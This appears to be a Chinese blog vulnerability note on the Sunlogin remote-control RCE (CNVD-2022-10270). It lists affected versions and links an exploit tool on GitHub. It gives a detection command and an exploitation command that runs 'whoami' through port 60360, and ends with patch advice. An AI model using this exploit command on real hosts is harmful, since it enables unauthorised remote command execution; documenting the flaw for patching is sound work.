向日葵RCE(CNVD-2022-10270)

简介: 向日葵RCE(CNVD-2022-10270)

遵纪守法

任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得危害网络安全,不得利用网络从事危害国家安全、荣誉和利益

漏洞描述

向日葵是一款免费的,集远程控制电脑手机、远程桌面连接、远程开机、远程管理、支持内网穿透的一体化远程控制管理工具软件。上海贝锐信息科技股份有限公司向日葵个人版for Windows存在命令执行漏洞,攻击者可利用该漏洞获取服务器控制权。

风险等级

高危

影响版本

11.1.1
10.3.0.27372
11.0.0.33162

资产确定

SunloginClient_10.3.0.27372(目前版本已经修复)

EXP

https://github.com/TRYblog/sunlogin_rce_

漏洞检测

xrkrce.exe -h 127.0.0.1

漏洞利用

xrkrce.exe -h 127.0.0.1 -t rce -p 60360 -c "whoami"

修复建议

厂商已发布了漏洞修复程序,请及时关注更新:
https://sunlogin.oray.com/

目录
相关文章
|
存储 分布式计算 Java
深入探索Java在云计算领域的应用与优势
深入探索Java在云计算领域的应用与优势
630 0
WK
|
Python
Python中format_map()方法
在Python中,`format_map()`方法用于使用字典格式化字符串。它接受一个字典作为参数,用字典中的键值对替换字符串中的占位符。此方法适用于从字典动态获取值的场景,尤其在处理大量替换值时更为清晰和方便。
WK
383 36
|
Oracle 关系型数据库 MySQL
flink cdc 插件问题之报错如何解决
Flink CDC(Change Data Capture)是一个基于Apache Flink的实时数据变更捕获库,用于实现数据库的实时同步和变更流的处理;在本汇总中,我们组织了关于Flink CDC产品在实践中用户经常提出的问题及其解答,目的是辅助用户更好地理解和应用这一技术,优化实时数据处理流程。
|
JSON Go 数据格式
Go 读取 YAML 配置文件的两种方式
本文介绍了读取 YAML 配置文件的两种方式,第一种是通过 yaml.v3 包,第二种是通过 viper 包。如果是在项目里解析配置文件,推荐使用 viper 包,它支持解析多种格式的配置文件,监听配置文件的更新,修改配置文件等。
1851 1
Go 读取 YAML 配置文件的两种方式
|
Ubuntu Shell
Ubuntu常用操作
Ubuntu常用操作命令行教程,涵盖了文件系统导航、文件操作(增删改查)、权限设置、文本编辑器使用、软件包管理以及网络配置等基本命令和操作的详细说明。
248 0
|
安全 Java API
技术笔记:SpringBoot集成Swagger3.0(详细)
技术笔记:SpringBoot集成Swagger3.0(详细)
|
人工智能 安全 PHP
PHP特性之CTF中常见的PHP绕过
PHP特性之CTF中常见的PHP绕过
1224 1
|
消息中间件 Java RocketMQ
教程:Spring Boot整合RocketMQ的配置与优化
教程:Spring Boot整合RocketMQ的配置与优化